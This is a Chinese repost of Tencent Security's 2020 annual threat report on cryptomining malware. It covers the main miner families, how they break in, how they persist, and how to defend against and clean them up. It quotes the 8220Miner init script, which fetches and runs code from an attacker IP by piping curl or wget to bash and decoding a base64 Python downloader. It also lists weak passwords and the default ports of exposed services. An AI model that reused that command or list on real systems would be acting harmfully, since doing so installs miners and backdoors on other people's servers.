当前位置:首页 > 渗透破解 > 正文内容

腾讯安全发布《 2020 挖矿木马年度报告》:比特币涨 10 倍、门罗币涨 6 倍,挖矿木马同步增长

访客56年前 (1970-01-01)渗透破解957
一、摘要

2020年各类数字加密货币价格迎来暴涨,比特币价格一度超过5万美元/ *** C,市值达到9200亿美元,是2019年底的10倍之多,达到了历史更高点。同期挖矿木马最偏好的门罗币价格也同步增长6倍,这意味着黑客通过进行门罗币挖矿,兑现后收益可达到以往收益的6倍。

在如此大利益诱惑之下,黑产团伙已闻风而动,纷纷加入了对主机计算资源的争夺。一个典型现象就是,有大量挖矿木马在运行时,会尝试清除竞争对手木马。

门罗币价格曲线(数据来源:coinmarketcap.com)

根据腾讯安全威胁情报中心的检测数据,2020年挖矿木马上升趋势十分明显。

2020年挖矿木马增长趋势

本报告以腾讯安全产品获取的安全事件告警工单数据为基础,统计分析得出2020年挖矿木马的活跃家族TOP榜,从挖矿木马主要入侵特点、漏洞利用偏好、持久化运行手段等方面展示其主要威胁,预测未来挖矿木马攻击可能呈现的新趋势,给政企机构安全运维团队提供常见挖矿木马的防御清理建议。

二、挖矿木马风险

1.1 挖矿家族TOP榜
2020年度挖矿木马家族排名前三的分别为DTLMiner(永恒之蓝下载器木马)、H2Miner、GuardMiner,榜单中有通过永恒之蓝漏洞传播的为DTLMiner、NSABuffMiner、NSAGluptebaMiner,有利用Redis、Hadoop、Weblogic、Drupal、thinkphp等应用程序漏洞传播的为H2Miner、GuardMiner、z0Miner、8220Miner等家族,以及主要通过弱口令爆破进行传播的为KoiMiner家族。

1.2 挖矿木马的危害
挖矿木马最容易被感知到的影响就是服务器性能会出现严重下降,从而影响服务器业务系统的正常运行,严重时可能出现业务系统中断或系统崩溃。如下图所示案例,H2Miner挖矿木马运行时占用了98%的CPU资源,系统性能已严重受损。

其次,挖矿木马威胁事件往往伴随着攻击者组建僵尸 *** 。感染挖矿木马的同时,服务器已成为黑客控制的肉鸡电脑,除了硬件资源被浪费,黑客还可能利用失陷主机对其他目标进行攻击,包括蠕虫式的横向攻击扩散、对特定目标进行DDoS攻击、作为黑客下一步攻击的跳板隐藏攻击者线索或攻击真实意图、将失陷主机作为分发木马的下载服务器或C2服务器等等。

第三,失陷主机可能造成信息泄露。攻击者入侵成功,很多情况下已获得服务器的完全权限,只要攻击者愿意,就可能盗取服务器数据,使受害企业面临信息泄露风险,攻击者也可能在服务器下载运行勒索病毒,随时可能给企业造成更加严重的破坏。

第四,攻击者入侵安装挖矿木马的同时,还可能在服务器安装后门、服务和计划任务,实现对失陷主机的稳固长期控制。腾讯安全专家分析发现,较多挖矿木马威胁事件发生后,攻击者会添加管理员用户、安装远程控制软件,以及为方便攻击者下次连接开放特定的 *** 端口。

鉴于以上这些危害,我们建议政企机构安全运维人员高度警惕挖矿木马感染事件,挖矿可能仅仅是攻击者制造危害的之一步,极可能处于黑客入侵后危害最轻的阶段。

2.挖矿木马入侵通道

2.1 利用漏洞攻击
远程代码执行漏洞(RCE)可以让远程攻击者直接向后台服务器远程注入操作系统命令或者恶意代码,从而控制后台系统,挖矿木马攻击时最常用的远程代码执行漏洞TOP统计如下:

在2020年挖矿木马最常利用的RCE漏洞排行榜里,WebLogic CVE-2019-2725高居榜首。

此外,还有各种未授权访问漏洞被攻击者利用。即需要安全配置或权限认证的地址、授权页面存在缺陷导致攻击者可以直接访问,从而引发敏感信息泄露或恶意代码执行。挖矿木马攻击时常用未授权访问漏洞列表如下:

未授权访问应用类型 开放默认端口 Redis 6379 Hadoop Yarn RESET API 8088 Docker Remote API 2375 Kubernetes 10255/10250 Jenkins 8080 XXL-JOB 9999 宝塔面板phpMyAdmin 888 Apache Flink Dashboard 8081

PostgreSQL

5342 典型案例

案例1:Z0Miner利用公开仅15天的高危漏洞攻击挖矿

腾讯安全团队于2020年11月2日发现挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)进行攻击,本次攻击距离Weblogic官方发布安全公告(2020.10.21)之后仅仅15天。

挖矿木马团伙对于新漏洞武器的采用速度之快,由此可见一斑。这一案例促使安全研究人员需要更快速的响应高危安全漏洞,当面临数量庞大的云主机高危漏洞需要修补时,对安全运维人员构成极大挑战。

案例2:redis服务器配置弱口令致SuperManMiner控制约万台主机挖矿

腾讯安全威胁情报中心检测到利用Redis未授权访问漏洞直接写入计划任务,下载用golang语言编写的挖矿木马下载器superman,根据挖矿算力推测该团伙已控制约1万台失陷系统进行门罗币挖矿。

在本例中,部分政企机构使用Redis时,由于没有对redis进行良好的配置,如使用空口令或者弱口令等,导致攻击者可以直接访问redis服务器,并可以通过该问题直接写入计划任务甚至可以直接拿到服务器权限。

案例3:RunMiner控制约1.6万台主机挖矿

腾讯主机安全(云镜)捕获RunMiner挖矿木马利用Apache Shiro反序列化漏洞(CVE-2016-4437)攻击云服务器。RunMiner挖矿团伙入侵成功后会执行命令反弹shell连接到C2服务器对肉鸡系统进行远程控制,然后继续下载执行Run.sh,下载XMRig挖矿木马tcpp进行门罗币挖矿,病毒通过安装定时任务进行持久化。

根据RunMiner挖矿木马使用的门罗币钱包算力(约268.6KH/s)推算,该挖矿团伙已控制约16000台服务器执行挖矿任务。在黑客控制的服务器上还发现多个扫描探测、 *** 入侵和远程控制工具,该团伙显然是专业黑灰产经营团伙之一。

2.2 爆破攻击
用户在设置系统登陆密码时,为了方便记忆往往采用默认的空口令或者非常简单的密码例如admin、root、test、111111、123456等,使用这些密码导致黑客可以轻易猜解并登陆,从而入侵系统,部分常见的弱密码如下:
admin
admin12
admin888
admin8
admin123
sysadmin
adminxxx
adminx
root
roots
test
test1
test123
test2
password
aaaAAA111
888888
88888888
000000
00000000
111111
11111111
aaaaaa
aaaaaaaa
135246
135246789
123456

许多挖矿木马在传播时也会针对系统的弱密码进行爆破攻击,根据腾讯安全2020年云上安全报告提供的数据,默认用户名、端口名被爆破攻击的次数达数十亿次之多。常被挖矿木马爆破攻击的服务类型包括SSH、Mssql、Redis等,各类型爆破攻击对应的挖矿家族如下:

MS SQL
永恒之蓝下载器木马、GuardMiner 、MrbMiner、BasedMiner、贪吃蛇挖矿木马、快GO旷工

SSH爆破
永恒之蓝下载器木马、Ks3_Miner、LoggerMiner、8220Miner、DDG

Redis爆破
永恒之蓝下载器木马、H2Miner、GuardMiner、DDG

Msql爆破
Mykings

2.3 僵尸 *** 渠道
利用僵尸 *** 渠道分发成为挖矿木马越来越偏好的传播手段之一,挖矿木马自身也在组建僵尸 *** 。僵尸 *** 在分发安装挖矿木马的同时,还会下载持久化模块、远程控制模块、攻击传播模块、自动更新模块等多种恶意组件,以达到对已感染机器进行长久利用和控制的目的,已失陷的肉鸡系统又会成为新的攻击源,如此不断扩大僵尸 *** 的规模。

具有僵尸 *** 特征的挖矿木马TOP榜如下,其中前三位是DTLMiner(永恒之蓝下载器木马)、H2Miner、GuardMiner为老牌僵尸 *** ,由于控制该僵尸 *** 的幕后黑客团伙仍在不断更新其攻击 *** ,使其在出现后的数年里仍然保持很高的活跃度。

在2020年新活跃的挖矿木马家族以Linux服务器为攻击对象的居多,例如通过SSH弱口令攻击的Outlaw、Prometei,通过Docker Remote API漏洞入侵的Team *** ,以及通过Nexus Repository Manager 3弱密码入侵,利用Mysql、Tomcat弱口令爆破,Weblogic远程代码执行漏洞进行横向扩散的Sysrv-hello家族等等。

典型案例

案例4:Team ***
Team *** 挖矿团伙通过批量扫描公网上开放2375端口的云服务器,并尝试利用Docker Remote API未授权访问漏洞对云服务器进行攻击。

Team *** 在成功入侵云服务器后,会隐藏进程,通过安装定时任务持久化,并收集主机上的隐私数据(如主机用户名和密码、RSA登录凭证、AWS CLI跨账户授权信息、docker配置信息)上传到C2服务器。与此同时,为了控制更多肉鸡系统,增加挖矿收益,Team *** 团伙还利用SSH复用连接进行横向移动以感染更多服务器。

案例5:Sysrv-hello
腾讯安全威胁情报中心检测到Sysrv-hello僵尸 *** 对云上Nexus Repository Manager 3存在默认帐号密码的服务器进行攻击。得手后再下载门罗币矿机程序挖矿,同时下载mysql、Tomcat弱口令爆破工具,Weblogic远程代码执行漏洞(CVE-2020-14882)攻击工具进行横向扩散。其攻击目标同时覆盖Linux和Windows操作系统。

案例6:Outlaw
腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸 *** 攻击。亡命徒(Outlaw)僵尸 *** 最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸 *** 已造成国内约2万台Linux服务器感染,影响上万家企业。

此次攻击传播的母体文件为dota3.tar.gz,可能为亡命徒(Outlaw)僵尸 *** 的第3个版本,母体文件释放shell脚本启动对应二进制程序,kswapd0负责进行门罗币挖矿,t *** 32、t *** 64负责继续SSH爆破攻击传播病毒。

3.挖矿木马持久化

入侵者攻击得逞之后,会通过各种技术手段安装后门、服务和定时任务,添加管理员帐户、开放 *** 端口,实现对失陷主机的持久控制。

3.1 Linux定时任务
WatchbogMiner通过多种方式创建定时任务,在指定的时间执行恶意代码:

1)通过写入文件创建
写入文件如下:
/etc/crontab
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/cron.d/system
/etc/cron.d/apache
/etc/cron.d/root
/etc/cron.hourly/oanacroane
/etc/cron.daily/oanacroane
/etc/cron.monthly/oanacroane

2)通过crontab命令创建

3)通过at命令创建

4)通过修改环境变量”/home/$me/.bashrc”、”/root/.bashrc”创建

3.2    Linux系统服务
1)WannaMine将恶意代码写入启动目录/etc/rc.d/init.d目录下,随系统启动执行。

2)8220Miner通过写入系统初始化脚本/etc/init.d/down,将恶意代码添加到启动项。

echo -e '#!/bin/bash ### BEGIN INIT INFO # Provides:         down # Required-Start: # Required-Stop: # Default-Start:     2 3 4 5 # Default-Stop: # Short-Description: down (by pwned) ### END INIT INFO (curl -fsSL hxxp://5.196.247.12/xms||wget -q -O- hxxp://5.196.247.12/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJ *** GliO2V4ZWModXJ *** GliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; lwp-download hxxp://5.196.247.12/xms /tmp/xms; bash /tmp/xms' > /etc/init.d/down

3)Muhstik僵尸 *** 通过写入/etc/inittab,添加恶意程序到系统启动项。

4)4SHMiner通过安装服务/etc/init.d/c3pool_miner启动挖矿脚本。

5)4SHMiner4SHMiner通过安装服务/etc/systemd/system/moneroocean_miner.service启动挖矿脚本。

3.3    Windows WMI
KingMiner使用WMI创建名为WindowsSystemUpdate_WMITimer的计时器,并将事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate _filter绑定到计时器,从而通过计时器每15分钟执行一次恶意脚本代码。

三、未来趋势

挖矿木马针对云上攻击增长较快,企业安全管理人员时刻面临新的挑战。黑灰产业对谋求非法利益的追求没有止境。受利益趋势,挖矿团伙对新漏洞武器的采用速度越来越快,这对防御方的安全响应能力提出了更高的要求。与此同时,众多 *** 组件的安全漏洞仍会源源不断涌现。

旧的挖矿僵尸 *** 依然活跃,新僵尸 *** 不断出现,模块化的、持续扩张、挖矿团伙跟僵尸 *** 相互勾结的情况日趋多见。这种复杂的安全态势使得政企机构难以采用单一技术方案防御和清除威胁。

四、安全建议

腾讯安全团队在20多年的安全实践中,逐步改进保护自身业务所采用的多层级安全解决方案,将安全威胁情报、主机云防火墙、云主机安全等一系列安全产品统一由安全运营中心(SOC)管控,构建多层次的纵深防御体系,全面阻断挖矿木马的攻击威胁。

腾讯安全全系列产品支持在挖矿木马、僵尸 *** 入侵攻击的各个环节进行检测、防御:

4.1 防御建议
1)建议政企机构运维人员对Linux服务器的SSH服务、Windows SQL Server等常用主机访问入口设置高强度的登录密码,以对抗弱口令爆破攻击。

推荐政企机构在终端部署腾讯云主机安全(云镜)产品,腾讯主机安全产品具有密码爆破拦截、异地登录提醒、木马文件查杀、高危漏洞检测等安全功能,可对云主机的Linux系统、Mysql、Tomcat等账号的弱口令进行检测。

2)对于Redis、Hadoop Yarn、Docker、XXL-JOB、Postgres等应用增加授权验证,对访问对象进行控制。

3)如果服务器部署了Weblogic、Apache Struts、Apache Flink、ThinkPHP等经常曝出高危漏洞的服务器组件,应及时将其更新到最新版本,并且实时关注组件官方网站和各大安全厂商发出的安全公告,根据提示修复相关漏洞。

推荐政企机构在 *** 边界部署腾讯云防火墙产品,腾讯云防火墙基于 *** 流量进行威胁检测与主动拦截,腾讯安全团队会及时响应更流行的高危漏洞利用,快速发布检测规则,使用虚拟补丁技术有效阻断挖矿木马入侵时利用的各类高危漏洞。

4.2 清理建议
政企机构运维人员可以使用腾讯主机安全产品检测清除入侵服务器的各种木马,根据主机安全木马查杀告警信息的指引彻底清除病毒木马。

在日常运维中,系统管理员可注意以下内容:
1)检查有无占用CPU资源接近甚至超过100%的进程,如有找到进程对应文件,确认是否属于挖矿木马,Kill 挖矿木马进程并删除文件;kill 掉包含下载恶意shell脚本代码执行的进程;

2)检查/var/spool/cron/root、/var/spool/cron/crontabs/root等文件中有无恶意脚本下载命令,有无挖矿木马启动命令,并将其删除;

3)如有发现挖矿相关进程、恶意程序,及时对服务器存在的系统漏洞、弱口令、Web应用漏洞进行排查和修复。

扫描二维码推送至手机访问。

版权声明:本文由黑客技术发布,如需转载请注明出处。

本文链接:https://w-123.com/32594.html

“腾讯安全发布《 2020 挖矿木马年度报告》:比特币涨 10 倍、门罗币涨 6 倍,挖矿木马同步增长” 的相关文章

德国摧毁俄罗斯暗网市场 Hydra 九头蛇 收缴价值 2500 万美元的比特币

据德国媒体报道,德国执法机构在最近的执法行动中扣押俄罗斯暗网市场Hydra的服务器,同时收缴价值2500万美元的比特币。不知道这个黑市的创始人是不是漫威的粉丝,所以才会起九头蛇这个名字。 目前访问该市场会弹出德国执法机构挂出的提示,而收缴的2500万美元比特币只是很小的一部分,具体来说是4月5日的一...

攻击者劫持英国 NHS 电子邮件帐户以窃取 Microsoft 登录信息

据调查,在近半年的时间里,英国国家卫生系统(NHS)的100多名员工的工作电子邮件帐户被多次用于网络钓鱼活动,其中一些活动旨在窃取Microsoft登录信息。在劫持合法的NHS电子邮件帐户后,这些攻击者于去年10月开始使用它们,并至少在今年4月之前将其继续用于网络钓鱼活动。据电子邮件安全INKY的...

微软禁用 MSIX AppX 安装程序以使用户免遭 Emotet、BazarLoader 类威胁

微软今天正式宣布,它已经禁用了MSIX应用安装程序协议以防止恶意攻击。该协议允许用户直接从网络服务器上安装各种应用程序,而不需要先将其下载到本地存储。当时的想法是,这种方法将为用户节省空间,因为不需要下载整个MSIX包。 然而,这种Windows应用程序安装包后来被发现用来分发恶意的PDF文件,如...

微软观察到许多攻击者开始对 Log4j 漏洞加以利用

12月14日,Apache Log4j 2团队发布了Log4j 2.16.0以修复这些漏洞。在补丁应用之前,所有现有的Apache Log4j运行服务器都将成为黑客的潜在目标。微软最近更新了预防、检测和解决Log4j 2漏洞的指南,向客户给出了解决和预防方案。 据微软称,攻击者正在积极利用Log4j...

黑客利用恶意软件 Tardigrade 攻击生物制造设施

Hackernews编译,转载请注明出处: 今年,借助一个叫做 Tardigrade 的恶意软件装载器,一个 APT攻击了 两家生物制造公司。 生物经济信息共享与分析中心(BIO-ISAC)发布了一份公告,其中指出,恶意软件正在整个行业中广泛传播,它们的目的可能是盗窃知识产权,保证持续性,并用勒索...

在 ESET 和微软帮助下 乌克兰成功阻止针对能源设施的网络攻击

在 ESET 和微软研究人员的帮助下,乌克兰官员表示成功阻止了一起针对能源设施的网络攻击。在本次阻止攻击过程中,它们发现了 Industroyer 的新变种,它是一个臭名昭著的恶意软件,在 2016 年被 Sandworm APT 组织用来切断乌克兰的电力。 乌克兰政府计算机应急小组(CERT-U...

评论列表

只酷闻枯
2年前 (2022-07-21)

跃,新僵尸网络不断出现,模块化的、持续扩张、挖矿团伙跟僵尸网络相互勾结的情况日趋多见。这种复杂的安全态势使得政企机构难以采用单一技术方案防御和清除威胁。四、安全建议腾讯安全团队在20多年的安全实践中,逐步改进保护自身业务所采用的多层级安全解决方案,将安全威胁情报、主机

馥妴七禾
2年前 (2022-07-21)

Struts、Apache Flink、ThinkPHP等经常曝出高危漏洞的服务器组件,应及时将其更新到最新版本,并且实时关注组件官方网站和各大安全厂商发出的安全公告,根据提示修复相关漏洞。推荐政企机构在网络边界部署腾讯云防火墙产品,腾讯云防火墙基于网络流量进行威胁检测与主动拦截,腾讯安全团

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。